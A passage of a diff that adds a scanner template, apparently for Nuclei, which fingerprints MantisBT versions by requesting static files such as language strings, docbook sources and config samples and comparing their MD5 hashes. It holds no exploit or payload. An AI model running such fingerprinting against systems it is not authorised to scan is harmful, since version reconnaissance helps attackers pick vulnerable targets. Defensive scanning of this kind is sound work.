"(\"09211ddc162ea140a406dc1cf74c99be\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"7f2f3821edb4243d6452f1132455db41\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"8ce8a561d25758fb94177b945697af0c\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"2d9369b9f3dfd33a1f41970b5f2527ef\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5f498e1543ca6b598cf331fc342962f6\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"ca620948684657a2a53eb3819f2872f8\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.13.2 + dsl: + - "(\"8a6d0c8f5b06998d128962ce90e43ed6\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"efcb1307151c9a9fe6355b7f76bbd9f7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/publican.cfg" + + matchers: + - type: dsl + name: 1.3.1 - 2.10.1 + dsl: + - "(\"610694dcb1d56a3406fcdc51ea179400\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"cf44df7e41083a620c9c0f128bf52a39\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: + - "(\"8b63ca0b4b8e2400846994d54aa21ea8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/publican.cfg" + + matchers: + - type: dsl + name: 1.3.1 - 2.10.1 + dsl: + - "(\"079f9593e147f5813d1404dfd347fb13\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"61f1ab6cc219a3cf30d2d9abe9ae62fc\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: + - "(\"f19b5d6db810638710413589395d9661\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_french_canadian.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"39e9dc967fb670bd0855b3cc1d3b1147\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"df3f6574b4e4814c0b8c1390c68bb92e\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"743c91e2c91ee02396daf08de2d67d94\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_traditional_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"4ef8c52ef0089252f25ee86b120d54c3\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f298d92cd7d5d8918e78c24945387afb\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"d5e69ea2439d56d6f88c1baa3266b113\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_japanese_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"2e6a0b48af81a8153841fcdb1a5d4698\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"b4bf3bc5be59c79e21d410dcab2483e6\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"0ea6a3ee98fea276a9130367087d07d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_simplified_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"46b6c9841febac3c1d7c2b66c1e70a56\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"cfdbb09a36f53c164a14ee3ad4b0daf1\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"db96efc51e077d536499d5ed37eed64e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_russian_koi8.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"cb6c77b8617c19c6572ffc77f577089b\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"cc5e7727bc4381bcc46138699b9c9646\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"ed9486782d1776d5f627e28161688df9\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"7bacf4ac892f2be68e43218c76f9a31e\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"42518509392b761122a379cd2ba2a99b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_norwegian.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"4781d3df05bfd8911974c18052ce2601\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"eee56130a53da6bb243d40fae4ddacab\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"1746a0cf0d5984872398b6193e9754c3\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"09b7ac79b076fe2e8b6198a58232b482\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"2c35e0009d8db1b99b2ce99fc66909ea\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"85569e0d2bf2f73f0bd366c676ebeee0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_japanese_euc.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"212d6df9c9d9a26f15cb12dbe0661d4f\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"b357e8441adf0e8f5d9c19032682c477\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"2b0eb38a5b5500dd66f6fc85036e20ad\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f80699a4c1d17478c49f276ed82ab057\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"b4f631b01c0eb100e6f48f5114b02152\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_japanese_sjis.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"6bad679a9231097b91e4e9281356c938\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"bc0c3abecdf15c034fe0b68168c600fe\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"ee10f7b426ae99c14c1d26534d27c134\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"8c3b195112b7094a0284c99527e77db8\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"5ac9a928b8d1b3bbb2824e93d9b12aa5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_ta.txt" + + matchers: + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"62fead39d666c8cb6737b734158f1139\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"7833ba9a015ca653f2066bf025423cd1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/page_descriptions.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"464d60b42881287194b39c506444afc3\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"d2a41796705e0fd14ea660ca72652fe3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/project_management.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"216926dd3af65dcd8bb909a8b29fca3a\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"79d8ce09a4cfdad0c3dab14f86dde4d3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/user_management.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"cf354340e84aae670500a77a659676e7\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"9898f7e63e46f44f4e8f6bbd2f0932fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/workflow.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"c7fea89f8e35467ff3410a54a958d2dc\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"1f5caaf3620619dc0a37c61723ed8fc3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/about.sgml" + + matchers: + - type: dsl + name: 1.2.20 + dsl: + - "(\"3cd1576073b410eb994881ddb81f584b\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.19 + dsl: + - "(\"3029687e45563dccd0fc4c1ab472c5db\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/troubleshooting.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"27152036282fe7d487409972f034b7a5\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"0069a3e7efa1393f32072997c8218ef3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/README.libs" + + matchers: + - type: dsl + name: 1.2.3 - 1.2.11 + dsl: + - "(\"58a1f60b3e0a1803a6221f2ad3c86921\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"8d8c9707bc07112d344552ecf578e5d4\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"4675e760906489b1da1b5aeeff6ef1e0\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.15 + dsl: + - "(\"0f0e55e9d058faf89e02ad055df2fdb5\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"f838e122c93f845a88f3c05d88edc58e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_logo_232x80.png" + + matchers: + - type: dsl + name: 1.2.9 + dsl: + - "(\"ba46364c699a330ee0aad0013db3054b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/config_inc.php.sample" + + matchers: + - type: dsl + name: 1.2.9 + dsl: + - "(\"d23628c6c35c4d99856c936693f1c39d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"5f3ddb7fc1bc44f79c434ac90eb0cbd4\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"9169fb4c690787814980ae92c26ad6c6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e2ae1f0a045a672d978674590e340905\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"240c9bfbbfc1347db8a0c900f68e32d5\" == md5(body))" + - type: dsl + name: 1.2.10 - 1.2.12 + dsl: + - "(\"39d8aaab882bea5c059b2bf7ba1c378d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"4c60109bbc91dfe5fcf13d00005569d7\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"a94ecf4fa055bccb443ad6576ab89488\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"0718d32c43cc6de832e2915328ad56eb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/common.js" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"4f392c05c3b19efa688361eab0885e9c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"4f8814a92419dc810d3455596cf4c5bd\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"3519e462251f88664d881f1929d5563e\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"3c612c4a36df4ef105089de27c0532da\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.19 + dsl: + - "(\"2266315828482c035856a5c59aea7202\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"fd2bd904e0d559e10a66a85ae5c27caa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.19 + dsl: + - "(\"de7d1ab7b6896417746460e306311f04\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"eaa2bb8c7fb2a1be1c7d90d454769487\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-output.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.19 + dsl: + - "(\"32c1619152d357bda4154beacc8f4de3\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"3dff931edd7087fb90f3e0ff3e53f0a5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-manage.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.19 + dsl: + - "(\"23a3f3efa90e7e708addd6729c912643\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"9905d2f4c3e4338e235acd247caf1392\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-account.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.19 + dsl: + - "(\"85dbdf38639de0cb8df7045d20276ce7\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"da1ddf9429d172fa60cba546e164669c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/admin.css" + + matchers: + - type: dsl + name: 1.3.1 - 1.3.20 + dsl: + - "(\"4f2b2798246f984affc4ad7c1031fba4\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"75335f0130e7e9162339e35bbabf82a0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 1.3.5 - 2.24.3 + dsl: + - "(\"1fc6578e8bdb3999221c7c0dec15f063\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"95b161401db7f2b70222201ce503ea6a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"5d12e7754a0cef43686b86ff1ce96811\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"ea19cfd8365239c4c60c6d8d9582dd00\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"02a479b01ab4f157b94d0ed90506c7c7\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"685ad3cb3595d18d6496e861d4e6f0a4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"5ab357198c04e5d998db76935948637f\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"e76e13ea009c1e9d48a8f7f10bad9251\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"327f4408b91edbda14d4086eb5ec2c89\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"aa26c8656fcc0ed851cd4b6500f37758\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.1.3 + dsl: + - "(\"6990c0b678fb5cfebbebbc1254f474e7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"84b23427fef16da479f6e4dc3e60c3f8\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"4825dd28ba91f729ae84b4fcf933656d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3f70c73f17c1259bb6e502d57d0fb6a8\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"32d9a5e4a5b001a73ba01ea39b5ffc94\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"abe859c3d9cedeb6e345dadd3a97174a\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"59c42a5ce3d0f686861f1eebf74dd6b6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_finnish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"bf69ed1796f74525aadfc30190849304\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9aa9f4de15b2620da11fd54abe8a19f2\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e9f7a4fde76f274ce4f4d7ca788a9423\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"cd49036fff622679418d1ee249badbc3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"678d3b7d85bf8b58ff6542d4dee51bc0\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9ba195cf4b57965b55b618fbf94c56a5\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"fb216576053f3181c5ee230a5d0d2fec\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"37dd357a4d978439cc844431034b606b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.24.3 + dsl: + - "(\"554b6acdbfd9a52e2668361eb7c3a3b1\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.2.4 + dsl: + - "(\"7527a104612d3d179b296c2ae788d5ec\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2a4b3fbe738c3880dfbaece32211df67\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"659eff620235c24db0a6740a1f88ae86\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"31016b13fe83cdfcf7c0a0ed869b979c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"99b657e1fa13440b7e9750c16fe2be52\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"6e0ec9de583cbd28d540dddc77515d24\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"59663028cc5fb6baf900e18c97de872e\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"00636145dd84677eb193ab3caab8e6b3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c57152c3d1ae992b38454207cd6507e4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"590d44fc317ce0c29c314cf8a229c671\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ba181e70c66abb52bdc1322f0720c110\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ec62e5c014c5786b724e077b1f55bb96\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"0c90cd4da6a4b985acec502d2ca8e3dd\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"4fe79b389f7e971810b584365ce4a98b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_slovak.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8048d1d6d3bd7d2f151d36cff75e4375\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f0ee771ae9a8b92bcc98bfbf65e076e9\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"c368bc061df8579e826088db706260f9\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"625accb84972d362f2087d7283814402\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"aec2452afb86d7effa903aae1732aff4\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c1d48005c0fe73d26b1eeb261dd137e3\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"187f05e65558487f4d5eeb8c9e2e0838\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"fb8e1cbacc9a44c7b5fbcc61464c0852\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"0ee6e6ede93648841310aa78188ea717\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_romanian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"56608fd7afcac11b668534ede128264d\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"389195122b3609a7ff8ea8092bf92042\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6293fbc72809c674f5b4ecf6acab8259\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"30ec77e99496703e1f877ec11f484996\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"dde356baa56bb9a21fcba8ccebe0a494\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"96998bd7920c43027359b187189eb0b7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"14415a935c411d4872a8de7a36dac617\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"574e0346144de5e588a9f83a66aaaf28\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ee72563102bc20446f20b475a22ad173\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"d28e0b09053cc3f26f880ff90248e0bc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c1a7df79c529faf3d121aa387d498e57\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"dd6dac1df1fb229e953b2d537f7f34ac\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"1a768c0c010bc3db5a3fe135ff1f90c4\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"6cc76b9695079ed1c9e8356fdbbe7a77\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2e6fcd4e0016a2b7c01e3b694ddb4723\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"f1f98b082f1a21ae23ddf0629ec89de8\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"41bb32a493644d798bcf4a30d6f06bc3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"29d32fcee8f30aa20f69605f0d81427b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"153ce917f5ab01f7186e105a3b946ae3\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a1f01d6e1fcd2a2cec92803ad79c9424\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_dutch.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"5173742979f0c49a462d11edda14462a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"169c3dcab8ca1a8151e544200ac5e452\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ade763db2735c1f4a8caa5bd04f91b9d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"cc4d545dd494f8a1644bcea449397ad7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5a9c8c075b21810074dfc8e15446dbae\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"3203e85f921c2588b870ac8133a8ca17\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"b08b7098b467efab079940c864eef67d\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"568c095b3c5abff6ca80478837f4707a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_occitan.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"309829a0d5ebd7918bbbb14bb0e0c7f8\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.1.3 + dsl: + - "(\"67db6b5c0f418bebf17295a7557db8a1\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"5860cc682d0a3ed79a025c1105a0ca84\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"db935da62106762ab3652db2a9b76d83\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"08f0f32492e7834e900a5fe76e8cd7b8\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"be1ffc606389e4e877c3300020f65234\" == md5(body))" + - type: dsl + name: 1.2.14 - 1.2.16 + dsl: + - "(\"95544e1de21f48525ab9613058909eb0\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"de01554b4fbf5b16533310b8514f9ea8\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"0b254acf9549fbd94f4712dc8c2f723e\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"611afee7920dddf90729cd37c78dc517\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"f413936c08d01aa8068a368f9843b93d\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"47da723680e05e9e82d9f86609d80553\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"bdfc1383a9ab545997eea124b16cc8d0\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"38a44697a7b13184d846fe2fa273421a\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"2c61814d1d6e107afdd684b6f476dc79\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"04744ad86ab2107dc29a3f92056c0bb9\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"08e87e38cd6641472245be899d021a35\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"0dde7a24f454f3959c7308a6b86f64dd\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"cb72516420341f557620bfeaee723cc9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_finnish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"01e86d1048a4b5bcdbc7839a8dc02726\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"700f50d126c9aebe188bce021ef0ed5b\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"64cb420e63e74f111ba5e73d0a8ef2d3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"93519d06759ca0e1a47424e6e3b92717\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9ec7bfbec69f4b347dda291b208c1b93\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1c34902383b543d3ae039218d87dfe27\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"7f9fcceed1089b7c5145b9c01b065553\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"80d4904ac9f1ab2a62a0bcf05b8f0e2a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_hebrew.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"597d89e1f97b371bd5fe21a9984d677c\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"4bcda4ca655f468738f904ce76a36eb6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"0c29b3726a8c4d3c3ed106da6324b095\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"637f20e22534c4d0b36572520692e7e6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1b06a40b2e90bc1fad2faa66632df422\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"e1ef47f10ecb87d04c5765df9b34e33c\" == md5(body))" + - type: dsl + 